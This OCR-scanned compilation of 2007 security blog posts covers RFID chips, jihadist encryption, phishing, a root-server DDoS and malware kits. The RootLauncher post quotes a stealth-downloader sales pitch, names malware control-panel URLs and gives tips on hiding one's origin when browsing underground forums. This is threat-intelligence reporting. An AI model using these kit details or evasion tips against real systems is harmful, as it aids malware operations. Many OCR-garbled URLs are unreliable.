mm — the smallest yet — which they aim to begin marketing in 2 to 3 years. By relying on 
semiconductor miniaturization technology and using electron beams to write data on the chip 
substrates, Hitachi was able to create RFID chips 64 times smaller than their currently available 
0.4 x 0.4mm [3]mu-chips. Like mu-chips, which have been used as an anti-counterfeit measure 
in admission tickets, the new chips have a 128-bit ROM for storing a unique 38-digit ID number." 


| will spare you the acronym as I’m sure you know which intelligence agency is sitting on 
the world’s largest budget, but just a wake up call that all technologies that are just getting 
commercialized or a first mention in the mainstream media have already been developed, 
even abondoned for more advanced alternatives by this agency years ago - despite the fact 
that Hitachi is a Japanese company it’s an U.S agency I’m talking about. [4]OSI are definitely 
remembering the old school days now. Picture courtesy of Hitachi comparing the chip’s size 
next to a grain of rice. 


UPDATE: [5]Slashdot picked up the story. 


. http://www. informationweek.com/news/showArticle. jhtml?articleID=196802844 


1 

2. neep:// ww. pinktentacle. con/2007/02/hitachi~develops-rf3d~powder/ 
3, htep://uwhitechi.co.jp/Prod/au- chip] 

4 
5 


. http://en.wikipedia.org/wiki/Office_of_Scientific_Intelligence 


. http://yro.slashdot.org/article.pl?sid=07/02/15/1715210 
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3.2.15 The Electronic Frontier Foundation in Europe (2007-02-15 16:29) 


[1]Couldn’t get any better : 


"The Electronic Frontier Foundation (EFF) opened a new Office in Brussels today to work with 
various institutions of the European Union (EU) on innovation and digital rights, acting as a 
watchdog for the public interest in intellectual property and civil liberties policy initiatives that 
impact the European digital environment. The new EFF Europe office, made possible by the 
generous support of the Open Society Institute and Mr. Mark Shuttleworth of the Shuttleworth 
Foundation, will allow EFF to have an increased focus on the development of EU law. EFF also 
plans to expand its efforts in European digital activism and looks forward to working with many 
groups and organizations to fight effectively for consumers’ and technologists’ interests." 


Finally [2]EDRI got some serious back-up on the frontlines. 


1. http: //www.eff.org/news/archives/2007_02.php#005111 
2. http: //www.edri.org/ 
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3.2.16 Terrorism and Encryption (2007-02-16 20:44) 


ay 


Taliban Singles Online 


Age 35 

Location: Cave 
Occupation Not Allowed 
Income: Not Allowed 
Hobbies Not Allowed 


Name: Frozan 

Age 28 

Location: Tert 
Occupation Not Allowed 
Income: Not Allowed 
Hobkies Not Allowed 


Occupation: French Joumalist 
Income: Not Allowed 
Hobbies Not Allowed 


Occupation: Not Allowed 
Income: Not Allowed 
Hobbies Not Allowed 


Name: Shawan 

Age 27 

Location; Cave 
Occupation Not Alowed 
Income: Not Allowed 
Hobbies Not Allowed 


SSS eee 


Occupation: Not Afoved 
incom & Not Mlowed 
Hobbies Not Allowed 


Occupation: Not Aloved 
incom & Not Allowed 
Hobbies: Not Allowed 


incom e& Not Alowed 
Hobbies Not Allowed 


Occupation: Not Alovwed 
incom & Not Allowed 
Hobbies Not Allowed 


Occupation: Nol Aloved 
incom & Not lowed 
Hobbies Not Allowed 


1121/314151617|619 


joe-ks.com 


About The Taliban EAQs SkeMap Privacy Polioyinotappkcabieto momen) Email Us 


[1]Jinadist themed encryption tool - using "infidel" algorithms : 


"The program’‘s ‘portability’ as an application (not requiring installation on a personal com- 
puter) will become an increasingly desirable feature, especially considering the high use of 
Internet cafe worldwide by pro-terrorist Islamic extremists,’ said iDefense Middle East analyst 
Andretta Summerville. "Mujahedin Secrets,’ which can be downloaded for free, offers ‘the five 
best encryption algorithms, with symmetrical encryption keys (256 bit), asymmetrical encryp- 
tion keys (2048 bit) and data compression,’ according to a translation of a Global Islamic Media 
Front’s announcement about the software on Jan. 1, provided by Middle East Media Research 
Institute." 


I’ve previously covered in-depth the topic of [2]steganography and terrorism, and provided an 
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example while assessing the threat - and hype - level of the [3]Technical Mujahid. Terrorists 
have this problem with the infidels, pretty much everything they use starting from the Internet 
and their cellphone, even software running on a computer is "Made in InfidelLand". So | pre- 
sume someone’s not really comfortable with even encrypting their data with a U.S made PGP 
software, so re-branding and adding a Jihadist theme seems to be the solution at least when 
PSYOPS count. [4]More info on the topic. 


1. http: //news.monstersandcritics.com/usa/features/article_1253544.php/Cyber-jihadis_use_of_encryptio 


2. http: //ddanchev. blogspot .com/2006/08/steganography-and-cyber-terrorism.htm 


3. http: //ddanchev. blogspot .com/2006/12/analysis-of-technical-mujahid-issue-one.html 


4. http://www.cs.georgetown.edu/~denning/crypto/cases.htm 


3.2.17 Delicious Information Warfare - Friday 16th (2007-02-16 22:24) 


Here are some articles and blog posts worth reading plus the related comments. [1]Previous 
[2]summaries as [3]well. 


[4]lslamic Terrorism from Clearguidance.com to Islamicnetwork.com - very interesting read- 
ing regarding Daniel Joseph Maldonado, and a visionary quote "It takes a community to make 
a terrorist and it only take a handful of people to build and maintain such communities." 


[5]Former DuPont senior scientist pleads to corporate espionage - fresh case of corporate 
espionage. As always | find it a totally biased opinion with companies falling in love with their 
trade secrets, even coming up with numbers as high as $400M 


[6]Information warfare, psyops, and the power of myth - decent article on the topics in 
today’s world of war on ideologies 


[7]Glitches plague NSA’s effort to track terrorists online - Tracking terrorists online courtesy 
of the NSA’s Turbulence program is a another $500M failure to understand the dynamics of 
cyberterrorism. Thankfully, there’re third-party organization the NSA is definitely listening 
to and obtaining its intelligence giving the lack of ethnical diversity in the U.S intelligence 
community, one that is crucial nowadays. The cuttest quote of the day "Inside the agency, 
Turbulence’s sensitive activities are sequestered behind passwords known to few." 
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[8]Panda Software Releases Malware Radar, the First Automated Malware Audit Service - 
not necessarily the first as pretty much all vendors offer [9]online malware scan, but it’s a 
product line extension based on recent licensing deals of Panda with other vendors 


[10]Another Malware protection engine becomes Malware enabler engine - when the [11]se- 
curity solution ends up the security problem itself 


[12]Hackers target the home front - great example of targeted email attacks, makes you 
wonder two things - what’s the chance the attacks aren’t really systematic but basically rather 
regular malware infection attempts, or the emails of top management or anyone @bank.com 
have been available to attackers wanting to take advantage of the insecurities of their home 
PCs 


[13]Turkish hacker strikes Down Under - Why shared hosting is unserious from a security 
point of view 


[14]’Storm’ Worm Touches Down on IM - [15]Storm Worm piece of malware switching vectors, 
interesting, but a fact demonstrating the novice experience of the malware author, as if it were 
an experienced one, the feature would have been build in the very first releases compared to 
mass mailings only 


[16]Top 10 Disrupters of 2006 - catchy slide show and here’s [17]the full story 


[18]Microsoft’s Patches - [19]Zero day Wednesday took place as well 


[20]Russia’s Ivanov slams U.S. missile shield plans in Europe - the proposed U.S missile shield 
in Eastern Europe would give Russia the excuse to do something naughty [21]like this 


[22]Cyber officials: Chinese hackers attack ’anything and everything’ - Chinese script kiddies 
generating noise so that the [23]advanced and government backed espionage attempts 
remain to be sorted through the noise - predictable pattern 


[24]Cuban Information Minister Blasts US Digital Espionage - Cuba to the U.S - Stop using 
OSINT and data aggregation techniques against us, as you see, we don’t know how to Google 
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[25]The Next Big Ad Medium: Podcasts - unless measurability improves it’s all shooting into 
the dark for advertisers, and ad budget allocation dream come true for publishers 


[26]How to Stalk Your Family - start by self-regulation, everyone? 


[27]Text of Email to all Yahoos - Yahoo’s CFO to all Yahoos, now if an average Yahoo is able to 
understand the corporate talk I'll bring the beer 


[28]China’s Submarine Fleet Continues Low Patrol Rate - outstanding analysis 


[29]Google Agrees to Buy Adscape - Google’s getting into the [30]Jemerging in-game adver- 
tising market. Would a gaming company find that the lack of ads in its game can turn into a 
competitive advantage in the long-term? 


[31]Yahoo co-founder Jerry Yang to donate $75 million to Stanford - never forget who you 
are and where you came from. Jerry Yang is donating $75M to Stanford University which as a 
matter of fact is largely financed by ex-disruptors, and yes tuition fees. They even hold quite 
some Google shares 


[32]CIA’s secret prisons - [33]full coverage 


1. http: //ddanchev. blogspot . com/2006/06/delicious~ inf ormation-warfare~1324.htm1 
2. http: //ddanchev. blogspot . com/2006/06/delicious- inf ormation-warfare-2427 .html 
3. http: //ddanchev. blogspot .com/2006/11/delicious-information-warfare-friday.html 
4. http://www haganah org. il/harchives/005915 .html 

5. http://www. delawareonline. com/apps/pbes . d11/article?AID=/20070215/NEWS/70215018 
6 

7 

8 

9 


_ http: //online journal. com/artman/publish/article_1754. shtml 
_ http://www. chron .com/disp/story .mp1/nation/4551586. html 
_ http: //biz. yahoo .com/prnews/070215/lath041. html? v=86 
_ http: //www.malwareradar . com/audits/what_is/ 
10. http: //blogs .zdnet .com/Ou/7p=426 
11. http://www. linuxsecurity.com/docs/malware-trends. pdf 
12. http: //technology . guardian.co.uk/weekly/story/0, , 2012712, 00.htm] 
_ http: //www.theregister .co.uk/2007/02/15/iskorpitz_hacks_nz/ 


. http: //www.eweek.com/article2/0, 1759, 2095572, 00.asp?kc=EWRSS03129TX1K0000614 


15. http: //ddanchev.blogspot.com/2007/01/social-engineering-and-malware.htm 


. http: //www.forbes.com/2007/01/22/leadership-disrupter-youtube-lead-innovation-cx_hc_0122lede_slide.htm 


13. http://w. theregister.co-uk/2007/02/16/iskorpitz_nacks.nz/ 


. http: //www.forbes.com/2007/01/22/leadership-disrupter-youtube-lead-innovation-cx_hc_0122lede.htm 
18. http://isc.sans.org/diary.php?storyid=2232 
19. http://www.securityfocus.com/brief/4 
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20. http://en.rian.ru/world/20070209/60466486.htm 


ttp://www.spacewar.com/reports/Russia_May_Unilaterally_Quit_INF_Treaty_999.htm 


22. http://www.fcw.com/article97658-02- 13-07-Web 


ttp://ddanchev. blogspot .com/2006/09/biggest-military-hacks-of-all-time.htm 


24. http://www. ahora. cu/english/SECTIONS/national/2007/february/14-02-07.htm 
25. http://www. businessweek.com/technology/content/feb2007/tc20070214_ 915949. htm 


ttp://www. forbes .com/2006/12/14/security-stalk-surveillance-tech-security-cx_11_1214stalk_slide.htm 


27. http://www.techcrunch.com/2007/02/14/text-of-email-to-all-yahoos 


F : : : -of- il-to-all- / 
. http://www. fas.org/blog/ssp/2007/02/post_2.php 
29. http://www.redherring.com/Article.aspx?a=2132 

. http://www.techcrunch. com/2007/02/16/google-to-buy-adscape-for-23-million/ 


ttp://www.iht.com/articles/ap/2007/02/16/america/NA-GEN-US-Yahoo-Stanford. php 


32. http://www.ft.com/world/us/renditio 
33. http://ddanchev. blogspot .com/2006/09/secret-cia-prisons.htm 


3.2.18 My Feed is on Fire, My Feed is on Fire! (2007-02-18 04:31) 


Feed Stats Dashboard 
Show stats for [one day | 


144 


Friday, February 16, 2007 


° 144 subscribers @ 


see more about your subscribers » 


I’ve never had so many people [1]connected to me, perhaps it’s the consequence of[2] Feed- 
burner detecting Google Readers as of this week, and yes the quality of the posts themselves. 
Here’s an [3]interesting opinion on the frequency of blog posting, | especially like the author’s 
understanding of the readers’ loyalty towards a blog. My [4]ROI is still positive whatsoever - 
[5]part two of Forrester’s series is also worth the read. 


1, ft tp: //feeds, feodburner. con/DanchoDanchevOnSecurityAndlewedia 
2. neup:/ologs. feedburner. con/ feedburner /archives/2007/02/the_google_ effect. pi 
3, htep:/ /wmw mpdediytix con/2006/08/s,viny_ blog post, frequency. does eal 

4. hetp:/ /ddanchev. blogspot .con/2006/10/return~ on investaent-of-blogging. Deal 
5. http: //blogs.forrester .con/charleneli/2007/04/aey_roh_of blog. neal 
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3.2.19 Beyond Traditional Advertising Packages (2007-02-18 04:58) 


[1]Differentiate your value proposition or cease to exist. And hey, that’s on Madison Avenue : 


" As a startup carrier that hadn’t yet hired a pilot, Virgin needed more than just slogans 
and 30-second commercials. That’s about when Anomaly, a two-year-old startup, brought a 
pitch that sounded more like a takeover bid: Carl Johnson, Anomaly’s 48-year-old co-founder, 
hauled out plans to design the interiors of Virgin’s new A320s, fashion the flight attendants’ 
uniforms, and create the content for a pay-per-view seat-back entertainment system. " 


You may also find [2]the best and [3]worst Super Bowl - the U.S ad industry’s favorite 
playground - ads entertaining. Meanwhile, Pepsi is anticipating the [4]DIY marketing culture 
and is asking everyone to help them [5]build their next billboard on Times Square. When 
advertising does its job millions of people keep theirs, isn’t it? 


1. http://money.cnn.com/magazines/business2/business2_archive/2007/02/01/8398979/index.htm?postversion=20070 
2. http: / logs. business2.con/nadisonavenuevest/2007/02/top_ten_best_ad_i tal faore 

3, http: / blogs. bsiness2, con/nadisonavemuovest/2007/02/top. ten. worst. a. html#nore 

4, kttp://adanchey. blogspot con/2006/04/iy-narketing-culture. html 

5. 


http: //www.thisisthebeginning.com/ 


3.2.20 Profiling Sergey Brin (2007-02-18 05:45) 
[1]Great weekend reading : 


" Stepping through the sliding glass door into their office is like walking into a playroom 
for tech-savvy adults. A row of sleek flat-screen monitors lining one wall displays critical 
information: email, calendars, documents and, naturally, the Google search engine. Assorted 
green plants and an air purifier keep the oxygen flowing, while medicine balls provide appro- 
priately kinetic seating. Upstairs, a private mezzanine with Astroturf carpeting and an electric 
massage chair afford Sergey and Larry a comfortable perch from which to entertain visitors 
and survey the carnival of innovation going on below. And there is ample space for walking 
around, which is absolutely essential for Sergey, who just can’t seem to sit still. " 
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A story that proves for yet another time that nothing’s impossible, the impossible just 
takes a little while. Here are some photos from [2]Google’s NYC headquarters, guess who 
likes to spoil its employees - sorry Googlers - most from all the tech companies these days? 
Say Google again! 


1. http: //www.momentmag.com/Exclusive/2007/2007-02/200702-BrinFeature. htm 


2. http: //www.informationweek.com/galleries/showGallery. jhtml?galleryID=4 


3.2.21 Cuba’s Internet Dictatorship (2007-02-19 23:08) 


And you thought [1]people in China suffer from the lack of free speech expression. Here’s the 
[2]cheap version of the great firewall of China, this time in Cuba : 


"Cuba built an Internet search engine that allows users to trawl through speeches by 
Cuban leader Fidel Castro and other government sites, but does not browse Web pages 
outside the island. 


Cubans cannot buy computers and Internet access is limited to state employees, academics 
and foreigners. Cubans line up for hours to send e-mails on post office terminals that cannot 
surf the World Wide Web. Passwords are sold on the black market allowing shared Internet 
use for limited hours, usually at night. " 


With Fidel Castro now seriously ill, the speeches will sooner or later turn into historical 
ones, the question is, which think-tank across the world would come closer in its predictions 
of [3]the situation in a post-Castro Cuba next to reality? On the other hand the U:S is starving 
Cuba’s bandwidth hunger to death, and considering their inability to invest in alternative 
sources for connectivity, the extend of degrading the quality of their Internet connectivity is 
almost unbeliavable as : 


"Cuba is forced to use a costly satellite channel with only 65 megabytes per second 
(mbps) for upload and 124 mbps for download, he said. " 


Even a France Telecom customer that has upgraded service to [4]Fiber@Home will be 
able to ping-to-death Cuba’s entire academic community. And while [5]Cuba recently blamed 
the CIA for digital espionage, it would take them unnecessary amount of time to download 
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sensitive material remotely given Cuba’s bandwidth capacity. Several other interesting events 
in case you remember were when [6]Kyrgyzstan got cut off from Internet by hacker attack, and 
when [7]Zimbabwe’s Internet was shut down because they forgot the pay their bill. Bandwidth 
matters, depending on [8]the perspective of course. 


The most recent report on [9]Censorship in Cuba is also worth going through : 


" To visit websites or check their e-mail, Cubans have to use public access points such 
as Internet cafes, universities and “Youth computing centers” where it is easier to moni- 
tor their activity. Then, the Cuban police has installed software on all computers in Internet 
cafes and big hotels that triggers an alert message when “subversive” key-words are noticed. " 


The only way to [10]undermine censorship is to talk about it - and mock it. 


1 fictp/édanchev blogepot.con/2007/02/consorahi-in-china-open- letter hal 
2. http://today.reuters.com/news/articlenews .aspx?type=internetNewskstoryid=2007-02-18T024401Z_01_N15177571_ 
3, jvep://w. rand. org/pubs /eechnicel_repores/2006 /RAND_TRISi- pal 

4. http: //slashdot . org/articles/06/07/26/127205 . shtml 

5, nvep://.ahore.cu/eng)sh/SEOTIONS nat ional /2007 February/i4-02-07 


6. http://209.85.129.104/search?q=cache : BNVyDT1qJ00J : www. ospint .com/text/d/3488924/+Kyrgyzstantgot+cutt+off+f 
om+Internet&hl=en&ct=clnk&cd=1 


Zi 
8 
9. 

10. 
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3.2.22 The Phishing Ecosystem (2007-02-21 11:15) 
Your Details 


Please confirm your membership 
details below 


Personal banking 1S 
- Premier banking Ss 
Business banking oO 


Surname [ 
Membership number 2010 fo 
Five-digit passcode | 

Memorable word | 


© yes 
Do you use telephone banking? c 
no 


Select the green ‘next’ button to continue. 


Phishing is the [1]efficient case of online social engineering. With the ease of sending phishing 
emails thanks to [2]malware infected PCs - [3]spamonomics 101 - as well as many other 
techniques for creating the pages and forwarders phishers use to trick users - it’s indisputable 
how much more profitable phishing is next to spam. 


This is perhaps the most [4]detailed summary of the emerging ecosystem I’ve read in a 
while. It walks the reader through the process of acquiring the resources for the attack 
and tracking down the results and provides overview of how malware authors, phishers and 
spammers work hand to hand due to the pressure put on their actions by the industry and, of 
course, the countless third-party researchers. Here’s a Summary : 


[5]Get an email list 

- Develop the attack 

- Locate sites to send phishing emails from 
- [6]Locate sites to host the phishing site 

- Launch the attack 

- Collect results " 


Around the industry, security researchers are again signalling the ongoing use of popular sites 
such as [7]MySpace for hosting phishing pages, [8]phishers are going Web 2.0 and starting to 
use [9]Google Maps, and seems like Castle Cops the anti-phishing community witnessed [10]a 
demonstration of DDoS bandwidth power which is definitely the result of the [11] 
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[12]consolidated anti-phishing initiative that they manage to keep on expanding. Moreover, 
yet another evidence of the developing ecosystem is the fact that [13]spam and [14]defaced 
sites aren’t what they used to be, namely are turning into malicious attack vectors. Despite 
that everyone’s claiming the commercialization of this entire ecosystem, [15]hacktivism is 
not dead! 


The "best" is yet to come, and let’s hope a more [16]suspicious common sense on the 
users’ part too. 


1. bapr Ten, wikipedia ong/iki/Rook, Faia 
2. beep: //vww.Limuxsecurity .con/docs/enlvare- trends. pal 

3. http: //radar.oreilly.com/archives/2007/01/spamonomics_101.htm1 

4. netp://wiv.securestcont.con/OLD/2006/presentations/54,SecurelT Pres0_V3. ppt 


5. http: //ddanchev. blogspot .com/2007/01/inside-email-harvesters- configuration .htm 

6. http: //ddanchev. blogspot .com/2006/12/phishing-domains-hosting-multiple.htm 

7. http://news.google.com/news/url?sa=tkct=us/0-0&f p=45dc254b2ee0f 5d9&ei=CAPcRcDwHdf 8wOGGr-iFBQ&url=http/3A/ 
8. http://www.computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=securitykarticleId= 
9 

10 


| hetp://wvy.castlocops,con/pird 

fctp://uvy caatlecops.con/pird 

13, htep://isc. sans.org/iary heal ?etoryid=2089 
| http: //adanchev blogspot. con/2006/05/current~energing-and-future-state-of_htall 
| http: //adanchev blogspot .con/2006/12/top-ten- scans~of-2006 heal 


15 
16 


3.2.23 Korean Zombies Behind the Root Servers Attack (2007-02-22 17:32) 


Current as of Wed Feb 22 08:18:30 EST 2007 
Total Tests: 22576 
Unique Client Sessions: 9/65 


Netblocks IP Addresses Autonomous Systems 


Estimated Estimated Estimated 
36520 out of 215810 393 million out of 2.06 billion 4500 out of 18710 
Netblocks Spoofable iP Addresses Spoofable ASes Spoofable 


More details on the recent DDoS attacks on the DNS root servers emerge, seems like [1]the 
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attacks originated from Sourth Korean infected PCs, but were orchestrated from a host server 
in Coburn, Germany : 


" Citing data from the North American Network Operators’ Group, the Korean govern- 
ment confirmed 61 percent of the problematic data was traced to South Korea. Yet, the 
Ministry of Information and Communication flatly rebuffs the suspicion that Korea was the 
main culprit behind the cyber attacks. “We learned a host server in Coburg, Germany ordered 
a flurry of Korean computers to stage DOS assaults on the root servers,” said Lee Doo-won, 
a director at the ministry. “In other words, Korean computers affected by viruses made raids 
into the root servers as instructed by the German host server. Many of our computers acted 
like zombies,” Lee said. " 


In a [2]spoofable IPv4 Internet packet’s authenticity is [3]the most common flaw exploited on 
[4]the front lines. The article points out that 61 % of the problematic data came from South 
Korea, and it would be logical to conclude the other 39 % came from Chinese and U.S based 
infected PCs, and while we can argue which country has the largest proportion of insecure end 
users - or insecure end users with access to huge bandwidth - that shouldn’t be the point, but 
how ISPs should start considering how to stop the malicious traffic going out of their networks, 
compared to their current mindset of outside-to-inside network protection. 


A battle lost for the botnet masters in their futile attempt to shut down three of the root 
servers, and a battle won for South Korea as they will definitely take this wake up call seriously. 
Meanwhile, [5]S. Korea’s CERT offers lots of interesting research reports on the local situation, 
particularly their latest [6]Internet Incident Trend Report. 


Graph courtesy of the [7]JANA Spoofer Project. 


1 
2. 
3. http://ddanchev. blogspot .com/2006/04/on-insecurities-of-internet_13.htm 
4. 

5. 


6. http://www. krcert.or.kr/english_www/inc/download. jsp?filename=070111_KoreaInternetIncidentReport_Dec2006. 
pdf 
7. http://spoofer.csail.mit.edu/ 


3.2.24 Image Blocking in Email Clients and Web Services (2007-02-22 18:06) 


Image Blocking in Webmail Clients 


Default Img Trusted-Sender Img Renders ALT 
Display Display Text 

Yahoo Mail on & & 
Yahoo Mail Beta on / / 
Windows Live off / x 

Mail 

Gmail off / sometimes 
Mac on as sometimes 
Hotmail on / a 

AOL on / / 


747 


Handy graphs and best practices on the state of [1]default remote image loading in desktop 
and online email clients - a problematic issue from a security point of view, and a marketing 
heaven from an advertising perspective : 


" Every client has its own default settings regarding displaying/hiding images. And while 
most email clients have a setting to turn images on or off, some offer conditional settings 
which are contingent upon known senders or other factors. The following table outlines the 
default settings of popular desktop- and webmail-clients. " 


Sometimes a spam email isn’t sent with the idea to trick someone believe into some- 
thing, but to act as a verification of that email’s existence in the form of remote image 
- [2]web bug - loading, and yes it could also act as a redirector to pretty much anything 
malicious. [3]Go through related posts in case [4]you’re interested, and also see a common 
[5]trade-off image spammers face. 


1. http://www. campaignmonitor.com/blog/archives/2007/02/current_conditions_and_best_pr_1.htm 


2. http://www. eff.org/Privacy/Marketing/web_bug. htm 

3. http: //ddanchev. blogspot .com/2006/09/email-spam-harvesting-statistics.htm 

4. http: //ddanchev. blogspot .com/2006/10/real-time-spam-outbreak-statistics.htm 
5. = i ‘ 


ttp://ddanchev. blogspot .com/2006/06/over-performing- spammer .htm 


3.2.25 The RootLauncher Kit (2007-02-23 01:59) 


Please enter the password to access the administration panel 


a 


Total number of installed unique launchers 1s: 1013 


After providing more insights on the [1]WebAttacker Toolkit and the [2]Nuclear Grabber, in this 
post I’ll discuss the RootLauncher, a release courtesy of the same group behind WebAttacker. 
Something else worth mentioning is that a large percentage of the sites I’m monitoring are 
starting to use authentication, and on a trust-basis login access, perhaps it’s due to the 
enormous coverage recent "underground" releases, namely phishing kits etc. got in the 
mainstream media. Therefore I’m doing my best to get as much information - and screenshots 
- before it dissapears and will blog on these releases as soon as my schedule allows me to. For 
instance, several months ago you could easily see over 50 publicly available control panels for 
the WebAttacker toolkit, now there’re only several available through Google. The same goes 
for RootLauncher. 


The RootLauncher kit is advertised - Rusian to English automatic translation - as follows 


" Just, we can offer you 3-version - Do wnl!oad e rdesigned RootLauncher for the 
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hidden load arbitrary WIN32 Exe-faila from a remote resource, followed by the launch of the 
file on the local hard disk. Obhodit all protection is not determined by any AV-Do not see 
fairvollah - Flexible settings - Periodic updates and supplements may download up to five exe 
files. Our team is not at the same point and develops all bolshe-bolshe for you dear friends 
services available to them closer you will be able to on our official website. We are also looking 
for people interested in partnership with us. " 


And while it’s supposed to be nothing more then an average downloader, these "aver- 
age downloaders" are actually starting to standardize features in respect to statistics and 
compatibility with other toolkits and malicious software. 


In a previous post at [3]WebSense’s blog, they came across a web panel showing that 
the "total number of unique launchers is 155" now count these as infected PCs, but as you 
can see in the image attached, the sample could be much larger. This one | obtained from the 
following URL : http://www. inthost7.com/cgi-bin/rleadmin.cgi which is of course down, but was 
listing 1013 launchers already, here’s [4]an analysis of this very same URL. 


[5]IP cloaking when browing such sites and forums is important in order for you to re- 
main as anonymous as possible. If you’re on a Russian site make sure you’re a Russian 
domain, if you’re on a Chinese site make sure you're a Chinese domain, and most importantly 
don’t directly translate through Google or Altavista, but copy and paste what’s interesting 
to you so that you wouldn’t let someone wonder why would a Russian domain translates a 
Russian text to English. Imagine the situation where security vendors browse them through 
their securityvendor.com subdomains, the results will follow shortly - everything dissapears. 


Web-Attacker (1EL0604) config editor 


Enter here am URL path for CGI-script on your server 


http://www. yourhost .com/cgi-binfie0604 cgi 


Enter here the folder name for placing an output explot components 


| c:\le0604\Output 


Web-Panel password : 


[x | camel 3 


(c) by Inet-Lux Team ( http:// 


Registered to ID 1234A4BCD 


In respect to the WebAttacker, the kit is still widely used but the people using and updating 
it are starting to prevent Google from crawling and caching the control panels, which makes 
it harder to keep track of the sites in an [6JOSINT manner - my modest honeyfarm keeps me 
informed on URLs of notice though. Here’s one of the very few instances of a [7]Web-Attacker 
Control Panel still available at Google. Here’s [8]an analysis of the source code of the 
Web-Attacker kit as well - and | thought I’m going full disclosure. More details on various 
newly released packers, multi-exploit infection toolkits, and standardized statistics with all the 
screenshots I’ve managed to obtain will follow next week. 


Taking into consideration the big picture - like you should - the release and automation 
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of phishing/exploit kits and lowering the entry barriers for script kiddies to generate enough 
noise to keep the real puppet masters safe, or at lease secretly pull the strings. I’d rather we 
operate in the time when launching a phishing attack required much more resources than it 
requires today. 


http: //ddanchev. blogspot .com/2006/04/wild-wild-underground_25.htm 
ttp://ddanchev. blogspot .com/2006/11/nuclear-grabber-toolkit .htm 
ttp://www.websense.com/securitylabs/blog/blog. php?BlogID=10 


1. 
2. 
3. 
4. http: //seguridad.internautas.org/htm1/1/930.htm 
5. 
6. 
12 


http: //ddanchev. blogspot .com/2005/12/ip-cloaking-and-competitive.htm 


ttp://ddanchev. blogspot .com/2006/09/benef its-of-open-source-intelligence.htm 


ttp://209.85.129.104/search?q=cache: hT21AVK3eMI J: img. secondsite2.com/cgi-bin/ie0604.cgit+intitle: ,22Web- 


tacker+Control/22khl=en&ct=clnk&cd=2 
8. http: //www.websense.com/securitylabs/blog/blog.php?BlogID=94 


3.2.26 Characteristics of Islamist Websites (2007-02-23 02:19) 


Excellent and recent analysis of [1]the most common characteristics of islamist websites 
published by the Middle East Media Research Institute : 


"The media platform favored by the Islamist organizations is the Internet, which they 
prefer for several reasons: firstly, for the anonymity it allows - anyone can enter and post to 
a site without divulging personal information; secondly, due to the medium’s availability and 
low cost - all that is required is a PC and an Internet connection; and thirdly, due to the ability 
to distribute material to a great number of people over a wide geographic area in a matter of 
seconds. 


The organizations use the Internet mainly for propaganda and indoctrination, but also for op- 
erational military needs. 


This paper will discuss the distinguishing characteristics of the websites of Islamist organiza- 
tions and their supporters; the various online activities through which terrorist organizations 
assist the mujahideen on the ground, both militarily and, especially, with propaganda; and the 
Internet polemics that these organizations conduct vis-a-vis their enemies." 


The majority of articles you’ve probably read are doing nothing more than scratching 
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the surface of the topic. Fundraising, propaganda, communications within steganographic 
images and the use of plain simple encryption, or the thriller type of scenarious where entire 
food supply chains get remotely controlled or where your next dose of Prozac may be a little 
bit more dangerous than it actually is, of course because terrorists may have the capacity 
to do so. In the post 9/11 world terrorist experts started emerging from all over the globe, 
universities realizied the potential and opened up educational courses, even degrees, security 
companies started pitching their offers with cyberterrorism in mind, and last but not least 
the mainstream media doesn’t seem to stop piggybacking on historical events while actually 
doing terrorists the biggest marketing favour of them all - the media echo effect. Someone 
blows him or herself up in the Western world, and everyone forgets about all those little things 
people die from if you are to go through you local statistical institute and see the death rates, 
but starts requesting more information on what is your government doing to prevent this from 
happening. But compared to the same situation in the Middle East - it’s part of the daily life, 
nothing ground-breaking besides a bunch of low lifes radicalizing online, looking for masters 
of brainwashing mentors, and most importantly looking for a mighty excuse for their pathetic 
existence. A terrorist organization [2]uploads a video of shooting a soldier or anything that 
will shock someone’s who's still getting shocked by the The Texas Chainsaw Massacre - boring 
try the [3]Evil Dead series - and people become so outraged and get this feeling of being 
helpness in the situation that fear compared to reality drives the entire model of terrorism. 


Terrorism is successful as both, a [4]government’s doctrine for re-election, and as a term 
mainly because it’s a very open topic term these days. In some countries [5]glorifying 
terrorism is illegal, but if you let you government convince you that it’s not terrorizing you 
to protect you from an event that from a statistical point of view doesn’t happen that very 
often, | think | will lose you as a reader of this blog. The world is losing the war on terrorism 
because it’s rational, and terrorists aren’t rational. In the very same fashion that companies 
don’t compete with companies but with networks, a network that’s anything but irrational 
isn’t going to be beated by a network that’s too bureaucratic and still waging departamental 
wars. 


[6]Go [7]through [8]many [9]of [10]my [11]previous [12]posts on [13]cyberterrorism, a 
relevant [14]collection of cases, and [15]through the research which as a matter of fact is full 
with practical examples of various sites. 


ttp://memri.org/bin/articles.cgi?Page=archiveskArea=ia&ID=IA3280 


. http: //www.foxnews.com/story/0, 2933, 251398, 00.htm 


ttp://en.wikipedia. org/wiki/The_Evil_Dead 


ttp://www.networkworld.com/columnists/2006/121806schwartau.htm 
ttp://www.boingboing.net/2007/02/15/glorifying terrorism.htm 


. http: //ddanchev.blogspot.com/2006/12/current-state-of-internet-jihad.htm 
. http://ddanchev. blogspot .com/2006/05/techno-imperialism-and-effect-of.htm 


ttp://ddanchev .blogspot.com/2006/08/cyber-terrorism-communications-and_22.htm 


ttp://ddanchev.blogspot.com/2007/02/forensic- examination-of-terrorists-hard.htm 


10. http: //ddanchev. blogspot .com/2006/06/tracking-down-internet-terrorist .html 


11. http://ddanchev. blogspot .com/2006/05/techno- imperialism-and-effect-of .htm 
. http://ddanchev. blogspot .com/2006/08/steganography-and-cyber-terrorism.htm 


ttp://ddanchev. blogspot .com/2006/12/digital-terrorism-and-hate-2006-cd-rom.htm 


14. http://del.icio.us/DDanchev/Cyberterrorism?setcount=50 


ttp://memri.org/bin/articles.cgi?Page=archiveskArea=ia&ID=1A3280 
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3.2.27 A Review of SiteAdvisor Pro (2007-02-23 03:09) 


McAtee SiteAdvisor ® 


During 2006, the company [1]popped out like a mushroom in front of my desktop as you can 
read in a [2]previous post, and on its acquisition [3]two months later. In the typical detailed 
and extensive CNET Reviews style, here’s what they have to say about [4]SiteAdvisor Plus : 


" SiteAdvisor Plus includes the ability to report suspicious links within IM and e-mail and 
can automatically block access to flagged sites. However, SiteAdvisor Plus lacks additional 
configuration options and doesn’t work with Firefox or Opera, or with branded browsers from 
AOL and other services. In addition, the paid version on Internet Explorer appears to conflict 
with the free version installed on Firefox. Overall, we experienced greater flexibility and 
fewer hassles when using the free Netcraft toolbar, and we also liked the proactive nature of 
Linkscanner Pro better. " 


The niche filling competition is also reviewed, namely [5]LinkScanner Pro. Niche filling 
